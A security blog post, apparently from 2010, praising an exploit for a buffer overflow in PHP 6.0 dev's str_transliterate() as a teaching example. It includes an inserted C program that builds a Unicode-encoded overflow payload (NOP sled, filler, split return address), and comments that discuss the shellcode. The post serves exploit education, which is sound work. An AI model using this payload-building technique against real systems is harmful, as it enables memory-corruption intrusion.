Monday, April 5, 2010

PHP 6.0 Dev str_transliterate(): A Great Example!

Hi Folks,
Today I want to point out a nice exploit for the PHP 6.0 Dev str_transliterate() buffer overflow, written by Pr0T3cT10n. Why do I say it is a nice exploit? In my opinion it is a great, simple example of a buffer overflow: ideal for learning, and a good demonstration that even new applications carry old bugs when security is not part of the development process.
Right now I am thinking of the CeSeNA folks (cesena.ing2.unibo.it), many of whom are eager to learn how to inject shellcode through a buffer overflow. For all of you interested in the "art of exploitation", I suggest starting from this self-commenting example.



There are no comments on the shellcode, since I have discussed shellcode at length in the past. I will probably use this exploit in my future talks on buffer overflows. I hope you enjoy this didactic exploit.



Original code (download here)
Original vulnerable app (download here)


*Update:*
Yes, of course: \u4141 is two 'A' bytes (0x41 0x41) and \u9090 is two NOPs (0x90 0x90), because each Unicode character occupies two bytes in memory. So 20 x \u9090 = 40 bytes of NOP and 256 x \u4141 = 512 bytes of 'A'. Thanks to TheLeader for pointing it out.
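As an added example, not code from the original post or from the exploit it discusses, the C program below builds the same layout the update describes: 20 x \u9090 followed by 256 x \u4141, each code unit written as two little-endian UTF-16 bytes, so the sled is 40 bytes and the filler is 512 bytes. It goes one step beyond the update by showing how an arbitrary 32-bit value (a return address, say) has to be split into two code units so that its bytes land in memory in the right order, and it checks that neither half falls in the surrogate range, which a strict \u decoder would reject. The two-bytes-per-character representation comes from the update and the comments; the sample value 0x7C801234 and the strict-decoder assumption are this example's own.

```c
/* Added example: UTF-16LE payload layout for a Unicode-escaped overflow.
 * Not the original exploit; the str_transliterate() trigger is not shown.
 * Assumption: the target stores \uXXXX escapes as UTF-16 code units,
 * two little-endian bytes each (as the post's update and comments state). */
#include <stdint.h>
#include <stdio.h>

#define NOP_UNITS  20    /* 20 x \u9090  -> 40 bytes of 0x90 */
#define PAD_UNITS  256   /* 256 x \u4141 -> 512 bytes of 0x41 */
#define MAX_UNITS  (NOP_UNITS + PAD_UNITS + 2)   /* + 2 units for a 32-bit value */

/* Write one UTF-16 code unit as two little-endian bytes; returns bytes written. */
static size_t put_unit(uint8_t *out, uint16_t unit)
{
    out[0] = (uint8_t)(unit & 0xff);
    out[1] = (uint8_t)(unit >> 8);
    return 2;
}

/* Lone surrogates (D800-DFFF) are not valid UTF-16 characters. A decoder
 * that validates its input may reject or replace them, so a 32-bit value
 * whose halves land in that range cannot travel through this vector.
 * (Assumption of this example: the \u decoder is strict.) */
int unit_is_lone_surrogate(uint16_t unit)
{
    return unit >= 0xD800 && unit <= 0xDFFF;
}

/* Split a 32-bit value into the two code units that reproduce its
 * little-endian bytes in memory: low half first, then high half.
 * Returns 1 on success, 0 if either half would be a lone surrogate. */
int value_to_units(uint32_t value, uint16_t units[2])
{
    units[0] = (uint16_t)(value & 0xffff);
    units[1] = (uint16_t)(value >> 16);
    return !(unit_is_lone_surrogate(units[0]) || unit_is_lone_surrogate(units[1]));
}

/* Build NOP sled + 'A' filler (+ optional 32-bit value) as UTF-16LE bytes.
 * Returns the number of bytes written, or 0 if the buffer is too small or
 * the value cannot be encoded. */
size_t build_payload(uint8_t *out, size_t cap, int with_value, uint32_t value)
{
    size_t n = 0;
    if (cap < (size_t)MAX_UNITS * 2) return 0;
    for (int i = 0; i < NOP_UNITS; i++) n += put_unit(out + n, 0x9090);
    for (int i = 0; i < PAD_UNITS; i++) n += put_unit(out + n, 0x4141);
    if (with_value) {
        uint16_t u[2];
        if (!value_to_units(value, u)) return 0;
        n += put_unit(out + n, u[0]);
        n += put_unit(out + n, u[1]);
    }
    return n;
}

int main(void)
{
    uint8_t buf[MAX_UNITS * 2];
    /* 0x7C801234 is a constructed sample value, not a real address. */
    size_t n = build_payload(buf, sizeof buf, 1, 0x7C801234u);
    printf("payload: %zu bytes (%d NOP bytes, %d filler bytes, 4 value bytes)\n",
           n, NOP_UNITS * 2, PAD_UNITS * 2);
    printf("last four bytes: %02x %02x %02x %02x\n",
           buf[n - 4], buf[n - 3], buf[n - 2], buf[n - 1]);
    return 0;
}
```

The point to take away is that with this vector the attacker controls memory two bytes at a time: 0x7C801234 becomes the units \u1234\u7C80, whose bytes in memory are 34 12 80 7C, exactly what a little-endian 32-bit load expects. That pairing is also why the shellcode in the exploit reads oddly, as TheLeader notes in the comments.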

7 comments:

TheLeader said...

Yep, absolutely cool exploit =]
It was not that easy to figure out the Unicode attack vector though.

Actually the shellcode I wrote is a unicode version of this one:
http://nullbyte.org.il/View_31_WinExec%2017%20bytes%20%28XP%20SP3%20HEB%20x86%29.html

This exploit has a potential of being way more generic and work on multiple platforms, we're planning to rewrite it and release the new one in a few weeks.

Thanks guys!

Marco Ramilli said...

@TheLeader. I totally agree with you when you say

"This exploit has a potential of being way more generic and work on multiple platforms"

I am looking forward to see next release !

Thanks for following me.

TheLeader said...

Another interesting thing in your post I noticed right now - the buffer is actually 512 x 'A', the nops are 40 x 0x90 - that is because they are unicode encoded and each char = 2 bytes.

Also because of the unicode attack vector, every 2 bytes are shifted - which makes the exploit a little bit harder to understand (esp. the shellcode part) but I agree it is a nice example to learn from.

Marco Ramilli said...

@TheLeader

"Another interesting thing in your post I noticed right now - the buffer is actually 512 x 'A', the nops are 40 x 0x90 - that is because they are unicode encoded and each char = 2 bytes."

Hahaha, yes of course! The image is not fully correct, since \u4141 is a double 'A'. That's right! Thank you for the notice. I've been very busy today and the last 2 posts have been very rushed.

TheLeader said...

Well damn, seems I haven't been too focused either.
Since it is Unicode, it's not a double 'A'.

Checking the Unicode table reveals "\u4141" is rather this little Unicode character buddy: '䅁'.

Sorry, Too much ASCII exploitation makes these interpretations automatic - after all security researchers are human beings =]

TheLeader said...

Never mind, the in-memory representation of that character is 0x41, 0x41, which also represents a double 'A'.

So you can just ignore my last comment (what happens when I stay awake 'till 4AM ;] ).

Marco Ramilli said...

Yeah, I believe it's a common evil :)